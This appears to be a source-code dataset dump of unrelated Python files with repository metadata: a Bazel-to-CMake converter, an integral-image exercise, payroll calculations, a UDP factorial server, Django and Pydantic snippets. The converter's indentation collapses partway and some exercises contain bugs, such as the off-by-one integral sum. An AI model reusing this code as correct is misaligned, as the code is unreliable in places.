  Returns a list. (Under Python 3 the original map() returned a lazy,
  always-truthy iterator that could only be consumed once; a list comprehension
  behaves identically on Python 2 and 3.)
  """
  return [dep[1:] for dep in deps]
def IsSourceFile(name):
  """Return True when `name` looks like a C/C++ source file (.c or .cc)."""
  # str.endswith accepts a tuple of suffixes, replacing the `or` chain.
  return name.endswith((".c", ".cc"))
class BuildFileFunctions(object):
  def __init__(self, converter):
    # `converter` accumulates the generated CMake text on its .toplevel attribute.
    self.converter = converter

  def _add_deps(self, kwargs, keyword=""):
    """Append a target_link_libraries() command for the rule's deps, if any.

    `keyword` is inserted right after the target name (e.g. " INTERFACE"
    for header-only libraries).
    """
    if "deps" not in kwargs:
      return
    self.converter.toplevel += "target_link_libraries(%s%s\n  %s)\n" % (
        kwargs["name"],
        keyword,
        "\n  ".join(StripColons(kwargs["deps"]))
    )

  def load(self, *args):
    # Bazel load() statements have no CMake equivalent; ignore them.
    pass
def cc_library(self, **kwargs):
if kwargs["name"] == "amalgamation" or kwargs["name"] == "upbc_generator":
return
files = kwargs.get("srcs", []) + kwargs.get("hdrs", [])
found_files = []
for file in files:
if os.path.isfile(file):
found_files.append(file)
elif os.path.isfile("generated_for_cmake/" + file):
found_files.append("generated_for_cmake/" + file)
else:
print("Warning: no such file: " + file)
if filter(IsSourceFile, files):
# Has sources, make this a normal library.
self.converter.toplevel += "add_library(%s\n %s)\n" % (
kwargs["name"],
"\n ".join(found_files)
)
self._add_deps(kwargs)
else:
# Header-only library, have to do a couple things differently.
# For some info, see:
# http://mariobadr.com/creating-a-header-only-library-with-cmake.html
self.converter.toplevel += "add_library(%s INTERFACE)\n" % (
kwargs["name"]
)
self._add_deps(kwargs, " INTERFACE")
def cc_binary(self, **kwargs):
pass
def cc_test(self, **kwargs):
# Disable this until we properly support upb_proto_library().
# self.converter.toplevel += "add_executable(%s\n %s)\n" % (
# kwargs["name"],
# "\n ".join(kwargs["srcs"])
# )
# self.converter.toplevel += "add_test(NAME %s COMMAND %s)\n" % (
# kwargs["name"],
# kwargs["name"],
# )
# if "data" in kwargs:
# for data_dep in kwargs["data"]:
# self.converter.toplevel += textwrap.dedent("""\
# add_custom_command(
# TARGET %s POST_BUILD
# COMMAND ${CMAKE_COMMAND} -E copy
# ${CMAKE_SOURCE_DIR}/%s
# ${CMAKE_CURRENT_BINARY_DIR}/%s)\n""" % (
# kwargs["name"], data_dep, data_dep
# ))
# self._add_deps(kwargs)
pass
def py_library(self, **kwargs):
pass
def py_binary(self, **kwargs):
pass
def lua_cclibrary(self, **kwargs):
pass
def lua_library(self, **kwargs):
pass
def lua_binary(self, **kwargs):
pass
def lua_test(self, **kwargs):
pass
def sh_test(self, **kwargs):
pass
def make_shell_script(self, **kwargs):
pass
def exports_files(self, files, **kwargs):
pass
def proto_library(self, **kwargs):
pass
def generated_file_staleness_test(self, **kwargs):
pass
def upb_amalgamation(self, **kwargs):
pass
def upb_proto_library(self, **kwargs):
pass
def upb_proto_reflection_library(self, **kwargs):
pass
def upb_proto_srcs(self, **kwargs):
pass
def genrule(self, **kwargs):
pass
def config_setting(self, **kwargs):
pass
def select(self, arg_dict):
return []
def glob(self, *args):
return []
def licenses(self, *args):
pass
def filegroup(self, **kwargs):
pass
def map_dep(self, arg):
return arg
class WorkspaceFileFunctions(object):
def __init__(self, converter):
self.converter = converter
def load(self, *args):
pass
def workspace(self, **kwargs):
self.converter.prelude += "project(%s)\n" % (kwargs["name"])
def http_archive(self, **kwargs):
pass
def git_repository(self, **kwargs):
pass
def bazel_version_repository(self, **kwargs):
pass
def upb_deps(self):
pass
class Converter(object):
def __init__(self):
self.prelude = ""
self.toplevel = ""
self.if_lua = ""
def convert(self):
return self.template % {
"prelude": converter.prelude,
"toplevel": converter.toplevel,
}
template = textwrap.dedent("""\
# This file was generated from BUILD using tools/make_cmakelists.py.
cmake_minimum_required(VERSION 3.1)
if(${CMAKE_VERSION} VERSION_LESS 3.12)
cmake_policy(VERSION ${CMAKE_MAJOR_VERSION}.${CMAKE_MINOR_VERSION})
else()
cmake_policy(VERSION 3.12)
endif()
cmake_minimum_required (VERSION 3.0)
cmake_policy(SET CMP0048 NEW)
%(prelude)s
# Prevent CMake from setting -rdynamic on Linux (!!).
SET(CMAKE_SHARED_LIBRARY_LINK_C_FLAGS "")
SET(CMAKE_SHARED_LIBRARY_LINK_CXX_FLAGS "")
# Set default build type.
if(NOT CMAKE_BUILD_TYPE)
message(STATUS "Setting build type to 'RelWithDebInfo' as none was specified.")
set(CMAKE_BUILD_TYPE "RelWithDebInfo" CACHE STRING
"Choose the type of build, options are: Debug Release RelWithDebInfo MinSizeRel."
FORCE)
endif()
# When using Ninja, compiler output won't be colorized without this.
include(CheckCXXCompilerFlag)
CHECK_CXX_COMPILER_FLAG(-fdiagnostics-color=always SUPPORTS_COLOR_ALWAYS)
if(SUPPORTS_COLOR_ALWAYS)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fdiagnostics-color=always")
endif()
# Implement ASAN/UBSAN options
if(UPB_ENABLE_ASAN)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=address")
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address")
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=address")
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -fsanitize=address")
endif()
if(UPB_ENABLE_UBSAN)
set(CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -fsanitize=undefined")
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -fsanitize=address")
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -fsanitize=address")
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -fsanitize=address")
endif()
include_directories(.)
include_directories(generated_for_cmake)
include_directories(${CMAKE_CURRENT_BINARY_DIR})
if(APPLE)
set(CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -undefined dynamic_lookup -flat_namespace")
elseif(UNIX)
set(CMAKE_EXE_LINKER_FLAGS "${CMAKE_EXE_LINKER_FLAGS} -Wl,--build-id")
endif()
enable_testing()
%(toplevel)s
""")
data = {}
converter = Converter()
def GetDict(obj):
ret = {}
for k in dir(obj):
if not k.startswith("_"):
ret[k] = getattr(obj, k);
return ret
globs = GetDict(converter)
execfile("WORKSPACE", GetDict(WorkspaceFileFunctions(converter)))
execfile("BUILD", GetDict(BuildFileFunctions(converter)))
with open(sys.argv[1], "w") as f:
f.write(converter.convert())
| [
"jhaberman@gmail.com"
] | jhaberman@gmail.com |
2042a18ebd2635d24ba0c0e1e28ed797d4aa92ed | ecc70b25584f8191c4e87f17bba47aa20a79ce9a | /8C-L2/compute_integral_image.py | d32b1b73030bce414139793fe1ef91ab675c5a90 | [] | no_license | Craq/CV_NauKMA | 1f70a9a1c5a86fbcaf13cf07963610a11448efe7 | b31e40c7553bec61432482738c1eb11b0296ae34 | refs/heads/master | 2023-01-29T20:10:30.390783 | 2020-12-07T18:45:06 | 2020-12-07T18:45:06 | 318,352,567 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 706 | py | import cv2
import numpy as np
def compute_integral(img: np.array) -> np.array:
# TODO: Compute I such that I(y,x) = sum of img(1,1) to img(y,x)
integral = np.zeros_like(img)
for i in range(img.shape[0]):
for j in range(img.shape[1]):
integral[i,j] = np.sum(img[:i,:j])
return integral
img = cv2.imread('../images/dolphin.png', 0)
cv2.imshow("original_image", img)
print(img.shape)
# compute integral
img = np.float64(img)
I = compute_integral(img)
cv2.imshow("integral_image", (I / I.max()))
x1 = 150
y1 = 100
x2 = 350
y2 = 200
print("Sum: ", np.sum(img[y1:y2 + 1, x1:x2 + 1]))
print(I[y2, x2] - I[y1 - 1, x2] - I[y2, x1 - 1] + I[y1 - 1, x1 - 1])
cv2.waitKey(0)
| [
"oleksiy@syncwords.com"
] | oleksiy@syncwords.com |
f7a6e9fd1398c1e0e8618e84c6c7df4fd04d953e | a693a697d2fb72511498d801e2705e33b4bace36 | /web_app/frontend/apiCalls/templates/apiCalls/dict_key.py | 2c8683bb91afdcf05ebf40075e6f5b7c1168fef0 | [] | no_license | 17shashank17/CottonHub | fb49f9fae24af20e7fe86245620a691d3f487aea | 1b74ffeb269ccc20210e994c28836482173c48f0 | refs/heads/master | 2022-11-26T04:19:19.252935 | 2020-08-08T17:43:31 | 2020-08-08T17:43:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from django.template.defaultfilters import register
@register.filter(name='dict_key')
def dict_key(d, k):
'''Returns the given key from a dictionary.'''
return d[k] | [
"noreply@github.com"
] | 17shashank17.noreply@github.com |
e56dbc11a25a83004ad2831cd5b26bac1b74ec16 | ca1bd3e57699329b533d70789b607a8fc6d3c73d | /array/firstMissingPositive.py | 6017bb6e4af2d9e4b7fbaab82a3ccd3a30a61798 | [] | no_license | msps9341012/leetcode | 6719054e049b51c89fd8dab97f25109645e79805 | 2647ac891501f479ee31b223405e209b0347fac0 | refs/heads/master | 2020-05-30T03:54:28.420608 | 2019-10-04T04:03:28 | 2019-10-04T04:03:28 | 189,524,341 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | nums=[3,4,-1,1]
n=len(nums)
for i in range(n):
if nums[i] <= 0:
nums[i] = len(nums)+1
for i in range(n):
if abs(nums[i]) <= n:
nums[abs(nums[i])-1]=-abs(nums[abs(nums[i])-1])
for i in range(n):
if nums[i] > 0:
print(i+1)
print(n+1)
print (nums) | [
"a0113130@gmail.com"
] | a0113130@gmail.com |
c738593032b2cb1e342c37e3cc015a64a4fa4266 | 009d9c68a52e1f42ceb94da3828deda097abd7d8 | /database/schemas.py | 10292831e017de400fb8faf732e6420da05ce890 | [] | no_license | miranaky/synthea | 7b7973d680ec8f4f8e102fd0c278ceee47cc8200 | 870fa9e9c6deaf30c7cca5b0c0207bf3f40e0757 | refs/heads/main | 2023-08-19T17:39:27.980054 | 2021-09-15T14:38:03 | 2021-09-15T14:38:03 | 406,802,307 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | from datetime import datetime, date
from pydantic import BaseModel
class Concept(BaseModel):
"""
id : concept id
concept_name : concept 이름
domain_id : concept가 주로 사용되는 도메인(카테고리)
"""
id: int
concept_name: str
domain_id: str
class Config:
orm_mode = True
class Person(BaseModel):
"""
id : int 환자 id
gender_concept_id : int 성별 id
birth_datetime : datetime 생년월일
race_concept_id : int 인종 id
ethnicity_concept_id : int 민족 id
"""
id: int
gender_concept_id: Concept
birth_datetime: datetime
race_concept_id: Concept
ethnicity_concept_id: Concept
class Config:
orm_mode = True
| [
"noreply@github.com"
] | miranaky.noreply@github.com |
02a32ea594f73011395598d554f22b7b5b9e2724 | d52a193fbcc4fda5dddef59c5bd691933c81fe0b | /isomaticAppWeb/preguntaDiez.py | 762c49090454dde7f39501730cea10e8dbf6c5c9 | [] | no_license | solprmat/solpromatcore | 69c299357bb6f307b2822d985692b06db6f4c73c | 56dabd4f0189831215578bec5a623e99aeea143f | refs/heads/master | 2022-12-10T16:56:46.629211 | 2019-11-09T20:58:08 | 2019-11-09T20:58:08 | 205,091,159 | 0 | 0 | null | 2022-12-08T06:05:07 | 2019-08-29T05:57:38 | Python | UTF-8 | Python | false | false | 412 | py | from django import forms
class PreguntanDiez(forms.Form):
RESPUESTA_PREGUNTA_DIEZ = (
('a', 'a. Ana'),
('b', 'b. Jana'),
)
respuesta = forms.TypedChoiceField(
# label='preubas',
choices=RESPUESTA_PREGUNTA_DIEZ,
widget=forms.RadioSelect(attrs={
'class': 'custom-control-indicator',
})
)
fecha_registro_P010 = forms.DateTimeField | [
"cyateya35439@universidadean.edu.co"
] | cyateya35439@universidadean.edu.co |
f10928dfbfaaaf9bcacd693dd2490e33ad295b8d | bba3bc7e8a5eab7b22bfb18439f3d5816ebcf909 | /raw_convertor_m.py | 7acd17ea691607bf3850f6110c2429877c489311 | [] | no_license | sgaobnl/ProtoDUNE_LD | 3b2649cff843d0ebc6359a8c63ab3fb2a6334be4 | 1d84d18b45a7098eb879ad514386b255d8cd59be | refs/heads/master | 2023-05-02T02:33:28.804427 | 2019-01-08T21:28:21 | 2019-01-08T21:28:21 | 122,890,463 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,448 | py | # -*- coding: utf-8 -*-
"""
File Name: init_femb.py
Author: GSS
Mail: gao.hillhill@gmail.com
Description:
Created Time: 7/15/2016 11:47:39 AM
Last modified: 1/13/2018 3:40:00 PM
"""
#defaut setting for scientific caculation
#import numpy
#import scipy
#from numpy import *
#import numpy as np
#import scipy as sp
#import pylab as pl
import numpy as np
import struct
def raw_convertor_feedloc(raw_data, smps, jumbo_flag = True):
dataNtuple =struct.unpack_from(">%dH"%(smps*16),raw_data)
chn_data=[[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],]
feed_loc=[]
if (jumbo_flag == True):
pkg_len = 0x1E06/2
else:
pkg_len = 0x406/2
pkg_index = []
datalength = long( (len(dataNtuple) // pkg_len) -3) * (pkg_len)
i = 0
k = []
j = 0
while (i <= datalength ):
data_a = ((dataNtuple[i+0]<<16)&0x00FFFFFFFF) + (dataNtuple[i+1]& 0x00FFFFFFFF) + 0x0000000001
data_b = ((dataNtuple[i+0+pkg_len]<<16)&0x00FFFFFFFF) + (dataNtuple[i+1+pkg_len]& 0x00FFFFFFFF)
acc_flg = ( data_a == data_b )
face_flg = ((dataNtuple[i+2+6] == 0xface) or (dataNtuple[i+2+6] == 0xfeed))
if (face_flg == True ) and ( acc_flg == True ) :
pkg_index.append(i)
i = i + pkg_len
else:
i = i + 1
k.append(i)
if ( acc_flg == False ) :
j = j + 1
if ( len(k) != 0 ):
print "raw_convertor_m.py: There are defective packages start at %d"%k[0]
if j != 0 :
print "raw_convertor_m.py: drop %d packages"%(j)
tmpa = pkg_index[0]
tmpb = pkg_index[-1]
data_a = ((dataNtuple[tmpa+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpa+1]&0x00FFFFFFFF)
data_b = ((dataNtuple[tmpb+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpb+1]&0x00FFFFFFFF)
if ( data_b > data_a ):
pkg_sum = data_b - data_a + 1
else:
pkg_sum = (0x100000000 + data_b) - data_a + 1
missed_pkgs = 0
for i in range(len(pkg_index)-1):
tmpa = pkg_index[i]
tmpb = pkg_index[i+1]
data_a = ((dataNtuple[tmpa+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpa+1]&0x00FFFFFFFF)
data_b = ((dataNtuple[tmpb+0]<<16)&0x00FFFFFFFF) + (dataNtuple[tmpb+1]&0x00FFFFFFFF)
if ( data_b > data_a ):
add1 = data_b - data_a
else:
add1 = (0x100000000 + data_b) - data_a
missed_pkgs = missed_pkgs + add1 -1
if (missed_pkgs > 0 ):
print "raw_convertor_m.py: missing udp pkgs = %d, total pkgs = %d "%(missed_pkgs, pkg_sum)
print "raw_convertor_m.py: missing %.8f%% udp packages"%(100.0*missed_pkgs/pkg_sum)
else:
pass
smps_num = 0
for onepkg_index in pkg_index:
onepkgdata = dataNtuple[onepkg_index : onepkg_index + pkg_len]
i = 8
peak_len = 100
while i < len(onepkgdata) :
if (onepkgdata[i] == 0xface ) or (onepkgdata[i] == 0xfeed ):
chn_data[7].append( ((onepkgdata[i+1] & 0X0FFF)<<0 ))
chn_data[6].append( ((onepkgdata[i+2] & 0X00FF)<<4)+ ((onepkgdata[i+1] & 0XF000) >> 12))
chn_data[5].append( ((onepkgdata[i+3] & 0X000F)<<8) +((onepkgdata[i+2] & 0XFF00) >> 8 ))
chn_data[4].append( ((onepkgdata[i+3] & 0XFFF0)>>4 ))
chn_data[3].append( (onepkgdata[i+3+1] & 0X0FFF)<<0 )
chn_data[2].append( ((onepkgdata[i+3+2] & 0X00FF)<<4) + ((onepkgdata[i+3+1] & 0XF000) >> 12))
chn_data[1].append( ((onepkgdata[i+3+3] & 0X000F)<<8) + ((onepkgdata[i+3+2] & 0XFF00) >> 8 ))
chn_data[0].append( ((onepkgdata[i+3+3] & 0XFFF0)>>4) )
chn_data[15].append( ((onepkgdata[i+6+1] & 0X0FFF)<<0 ))
chn_data[14].append( ((onepkgdata[i+6+2] & 0X00FF)<<4 )+ ((onepkgdata[i+6+1] & 0XF000) >> 12))
chn_data[13].append( ((onepkgdata[i+6+3] & 0X000F)<<8 )+ ((onepkgdata[i+6+2] & 0XFF00) >> 8 ))
chn_data[12].append( ((onepkgdata[i+6+3] & 0XFFF0)>>4 ))
chn_data[11].append( ((onepkgdata[i+9+1] & 0X0FFF)<<0 ))
chn_data[10].append( ((onepkgdata[i+9+2] & 0X00FF)<<4 )+ ((onepkgdata[i+9+1] & 0XF000) >> 12))
chn_data[9].append( ((onepkgdata[i+9+3] & 0X000F)<<8 )+ ((onepkgdata[i+9+2] & 0XFF00) >> 8 ))
chn_data[8].append( ((onepkgdata[i+9+3] & 0XFFF0)>>4 ))
if (onepkgdata[i] == 0xfeed ):
feed_loc.append(smps_num)
smps_num = smps_num + 1
else:
pass
i = i + 13
return chn_data, feed_loc
def raw_convertor(raw_data, smps, jumbo_flag = True):
chn_data, feed_loc = raw_convertor_feedloc(raw_data, smps, jumbo_flag)
return chn_data
def raw_convertor_peak(raw_data, smps, jumbo_flag = True):
chn_data, feed_loc = raw_convertor_feedloc(raw_data, smps, jumbo_flag)
if ( len(feed_loc) ) > 2 :
chn_peakp=[[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],]
chn_peakn=[[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],[],]
for tmp in range(len(feed_loc)-1):
for chn in range(16):
chn_peakp[chn].append ( np.max(chn_data[chn][feed_loc[ tmp]:feed_loc[tmp]+100 ]) )
chn_peakn[chn].append ( np.min(chn_data[chn][feed_loc[ tmp]:feed_loc[tmp]+100 ]) )
else:
chn_peakp = None
chn_peakn = None
return chn_data, feed_loc, chn_peakp, chn_peakn
| [
"noreply@github.com"
] | sgaobnl.noreply@github.com |
027be171957866303961766d06619afe162b284c | 17c09e059f5fbd4d05b3aac5efc45451727d445b | /audit_trail/signals.py | f5511b76e95b86d91469d89b4c8e2e684bb27e53 | [
"BSD-3-Clause"
] | permissive | Dharmik8478/django-model-audit | bb5e0590b6b401727ecaa07a75201d80891934a3 | 9518a8810d9d8f937e9a374318197d88ffcc6f0f | refs/heads/master | 2021-09-14T08:23:47.704320 | 2018-05-10T10:18:03 | 2018-05-10T10:18:03 | 124,696,917 | 7 | 6 | BSD-3-Clause | 2018-05-07T10:12:08 | 2018-03-10T20:42:44 | Python | UTF-8 | Python | false | false | 98 | py | from django import dispatch
audit_ready = dispatch.Signal()
audit_m2m_ready = dispatch.Signal()
| [
"Dharmik@192.168.2.5"
] | Dharmik@192.168.2.5 |
f8718c0d7f4cfacddaa5c609343530b3ffbf96ad | b054942916d5b82c5c29e646d634a986d506ec65 | /Weasel_try1.py | 34ad40a6259a1c8aba8913c88c1538fb0b3e27cd | [] | no_license | ishanyash/Error-rates-on-UCR-TS | 21690913c71d8de8d50f2b3944eff804b3fe6967 | 2d10be12d6c6640523fcddedc9a095a0bb38803d | refs/heads/master | 2020-05-29T14:59:19.998868 | 2019-05-29T11:05:00 | 2019-05-29T11:05:00 | 189,208,814 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,407 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 24 17:44:56 2019
@author: Ishan Yash
"""
import numpy as np
from pyts.transformation import BOSS
from pyts.transformation import WEASEL
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
import pyts
print("pyts: {0}".format(pyts.__version__))
PATH = "G:/Coding/ML/UCRArchive_2018/"
clf = LogisticRegression(penalty='l2', C=1, fit_intercept=True,
solver='liblinear', multi_class='ovr')
dataset_adiac = "Car"
file_train_adiac = PATH + str(dataset_adiac) + "/" + str(dataset_adiac) + "_TRAIN.tsv"
file_test_adiac = PATH + str(dataset_adiac) + "/" + str(dataset_adiac) + "_TEST.tsv"
train_adiac = np.genfromtxt(fname=file_train_adiac, delimiter="\t", skip_header=0)
test_adiac = np.genfromtxt(fname=file_test_adiac, delimiter="\t", skip_header=0)
X_train_adiac, y_train_adiac = train_adiac[:, 1:], train_adiac[:, 0]
X_test_adiac, y_test_adiac = test_adiac[:, 1:], test_adiac[:, 0]
weasel_adiac = WEASEL(word_size=5, window_sizes=np.arange(6, X_train_adiac.shape[1]))
pipeline_adiac = Pipeline([("weasel", weasel_adiac), ("clf", clf)])
accuracy_adiac = pipeline_adiac.fit(
X_train_adiac, y_train_adiac).score(X_test_adiac, y_test_adiac)
print("Dataset: {}".format(dataset_adiac))
print("Accuracy on the testing set: {0:.3f}".format(accuracy_adiac)) | [
"noreply@github.com"
] | ishanyash.noreply@github.com |
ef2321b8b97d45abdc5f5a75d349f330e1d53bfe | ac82f18ea1dcb93db7224a82958012d34ddb5ae5 | /bank_systems/finance_bank_systems/4grade/bank_lab5.py | 19bb3fe7a35a5c7cec8fccce6885ed1e1e5ce0b4 | [] | no_license | rafasaurus/homework | 02c64d4ad57722307eabd5d3480ce6e552a7a8dd | ce9e6b5e696c7377b360b72b3161f1958dda4cc9 | refs/heads/master | 2021-04-30T15:21:07.422608 | 2019-04-18T19:20:50 | 2019-04-18T19:20:50 | 121,237,284 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,465 | py | import copy
def pureSalary(greedySalary_):
greedySalary = copy.deepcopy(greedySalary_)
# եկամտահարկ
if (greedySalary_ <= 150000):
greedySalary_ -= greedySalary*0.23
elif (greedySalary_ <=2000000):
greedySalary_ -= 150000*0.23 + (greedySalary - 150000)*0.28
else:
greedySalary_ -= 2000000*0.28 + (greedySalary - 2000000)*0.36
# կենսաթոշակ
if (greedySalary * 0.025 <= 12500):
greedySalary_ -= greedySalary * 0.025
else:
greedySalary_ -= 12500
# millitary stuff
greedySalary_ -= 1000
return greedySalary_
def pureHolidayFee():
holidayTaxJune, holidayPensionsJune, overallDailyFeeJune = getholidayTaxAndPensions(11, 300000)
holidayTaxJuly, holidayPensionsJuly, overallDailyFeeJuly = getholidayTaxAndPensions(9, 300000)
overallHolidayFee = overallDailyFeeJune + overallDailyFeeJuly
return overallHolidayFee - holidayTaxJune - holidayTaxJuly - holidayPensionsJune - holidayPensionsJuly
def getholidayTaxAndPensions(days, greedySalary):
# ''' returns եկամտահարկ, կենսաթոշակ, military stuff '''
premium = 200000
commitmentForWeekends = 30000
holidaySalary = 60000
pureSalary = 200000 # for 15 days that had been worked
surcharge = premium + commitmentForWeekends + holidaySalary # հավելավճար F
holidayDailyFee = (surcharge/12 + greedySalary)/21
overallDailyFee = days * holidayDailyFee
print("overallDailyFee: ", overallDailyFee)
# ____________________________________
# եկամտահարկ income tax
# աճողական գումար եկամտահարկ հունիս ամսվա
pureSalary_ = copy.deepcopy(pureSalary)
pureSalary_ += overallDailyFee
pureSalary += overallDailyFee
if (pureSalary_ <= 150000):
pureSalary_ -= pureSalary*0.23
elif (pureSalary_ <=2000000):
pureSalary_ -= 150000*0.23 + (pureSalary - 150000)*0.28
else:
pureSalary_ -= 2000000*0.28 + (pureSalary - 2000000)*0.36
# կենսաթոշակ
if (pureSalary * 0.025 <= 12500):
pensionsForMonth = pureSalary * 0.025
else:
pensionsForMonth -= 12500
# print("pensionsForMonth: ", pensionsForMonth)
incomeTaxForTheMonth = copy.deepcopy(pureSalary - pureSalary_)
# print("incomeTaxForTheMonth: ", incomeTaxForTheMonth)
# ____________________________________
# ************************************
pureSalary -= overallDailyFee
# եկամտահարկ income tax
incomTaxForDaysWorked = 0
if (pureSalary <= 150000):
incomTaxForDaysWorked = pureSalary*0.23
elif (pureSalary_ <=2000000):
incomTaxForDaysWorked = 150000*0.23 + (pureSalary - 150000)*0.28
else:
incomTaxForDaysWorked = 2000000*0.28 + (pureSalary - 2000000)*0.36
# կենսաթոշակ
if (pureSalary * 0.025 <= 12500):
pensionsForDays = pureSalary * 0.025
else:
pensionsForDays = 12500
print("pensionsForDays: ", pensionsForDays)
# ************************************
# արձակուրդի եկամտահարկ, և կենսաթոշակ
holidayTax = incomeTaxForTheMonth - incomTaxForDaysWorked
holidayPensions = pensionsForMonth - pensionsForDays
return holidayTax, holidayPensions, overallDailyFee
salary = 300000
days = 11
print("Salary: ", salary)
print("pure Salary: ", pureSalary(salary))
print("pureHolidayFee: ", pureHolidayFee())
| [
"rafa.grigorian@gmail.com"
] | rafa.grigorian@gmail.com |
338434bc1ec03b6dee0c92e2f8605e4e4d10b146 | c15321381fd501217f41a72c3c09f507ea52d75a | /server.py | 912ae5c056220794f169c6e0ff3b097cd4ac5440 | [] | no_license | coderaavan/basic_load_balancer | 5227074d12ab4b5a797a0d7122f45e1487676fd2 | cfb758ed049f91d4c3165cb0d5c5346ddd0fa1fb | refs/heads/master | 2023-05-09T01:52:12.934989 | 2021-05-21T22:00:13 | 2021-05-21T22:00:13 | 369,662,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 564 | py | import socket
import threading
import time
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('', 5000))
def factorial(num):
res = 1
for i in range(1, num+1):
res*=i
return res
while True:
format = 'utf-8'
msg_len, client_addr = server.recvfrom(64)
msg_len = msg_len.decode(format)
if msg_len:
msg_len = int(msg_len)
msg, client_addr = server.recvfrom(msg_len)
msg = msg.decode(format)
res = factorial(int(msg))
| [
"prashantravi@cse.iitb.ac.in"
] | prashantravi@cse.iitb.ac.in |
b05a1a04d85fa13fa3689baf4a17a6bdfd88cd21 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/303/usersdata/302/77727/submittedfiles/testes.py | a6dfe79fe6c3e23239396c351525102e509059c7 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 108 | py | n = float(input('Digite um número: '))
if n >= 0:
n = n**(1/2)
print(n)
else:
n = n**2 | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
0019d927654af92c948b4bab9d14988d2c1a11dd | ad637ade3fd0aa5dd0f54747dc614c17c6e4c0e1 | /blog/posts/admin.py | fdef9791f37f230ce69d9f09320d7433f9187eb6 | [
"MIT"
] | permissive | fikryans/django_subcategory | 9a3a2ae35d7a9a15edafb1937b4099b528a413de | 02589392d10603a46827b0d4f176934611460d2d | refs/heads/master | 2023-04-06T22:07:44.509988 | 2021-04-04T16:11:18 | 2021-04-04T16:11:18 | 354,566,879 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from django.contrib import admin
from mptt.admin import MPTTModelAdmin, DraggableMPTTAdmin
from .models import Category, Post
class CategoryAdmin(DraggableMPTTAdmin):
list_display=(
'tree_actions',
'indented_title',
),
list_display_links=(
'indented_title',
),
admin.site.register(Category,DraggableMPTTAdmin)
admin.site.register(Post) | [
"fikriansyah.hq@gmail.com"
] | fikriansyah.hq@gmail.com |
d1efbb180b13d3b691161c2b0e1ddc4699c66f34 | 3c12fc7a1617d9a81c69a27c46d393f4940b6b5d | /hash_requirements.py | 6bb480b67787d405d14ba317f55419c335458c7e | [] | no_license | Carl-Chinatomby/blockchain | 5c52891d557b767dd77f07d810f0631342825de9 | dce75c00e05d097bcc0c7d862d852bb249b8c21b | refs/heads/master | 2023-05-25T16:43:31.215888 | 2019-07-21T06:56:47 | 2019-07-21T06:56:47 | 124,698,626 | 0 | 0 | null | 2023-05-22T22:28:09 | 2018-03-10T21:08:28 | Python | UTF-8 | Python | false | false | 420 | py | from hashlib import sha256
x = 5
y = 0 # we don't know what y should be yet...
still_processing = True
while still_processing:
product = float(x*y)
current_hash = sha256('{}'.format(product).encode()).hexdigest()
if current_hash[-1] != '0':
print(current_hash, y)
y += 1
else:
print(current_hash, y)
still_processing = False
print('The solution to y = {}'.format(y))
| [
"Carl.Chinatomby@gmail.com"
] | Carl.Chinatomby@gmail.com |
96a91643f5d6c5d7f7005c78046cc95bcc883d24 | ec96d369ddd33bac64deb28a2d6c648bacb1b2d5 | /Commons/Constants.py | 956028e9e94e128b60a78f9061f6eeeb2bebb1f5 | [] | no_license | Deena4/Netportal | 14d5d912464e7c595df3d3ab6077d638d4f65a1d | 055deb6cdf04736bca8a7d3c305d2cd82712306e | refs/heads/master | 2022-05-22T14:36:40.248247 | 2020-04-29T10:04:19 | 2020-04-29T10:04:19 | 259,932,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 274 | py | customer = "TCP_AUT_GUI_RES_CUS_000_000_001_00001_POS"
provider = "TCP_AUT_GUI_RES_PRV_000_000_001_00002_POS"
view = "TCP_AUT_GUI_CFG_VWS_000_000_001_00003_POS"
facility ="TCP_AUT_GUI_INV_MIV_L1L_LAYER1_001_00004_POS"
circuit = "TCP_AUT_GUI_INV_MIV_L1S_LAYER1_001_00005_POS" | [
"mdeenadhayalan@tieroneoss.com"
] | mdeenadhayalan@tieroneoss.com |
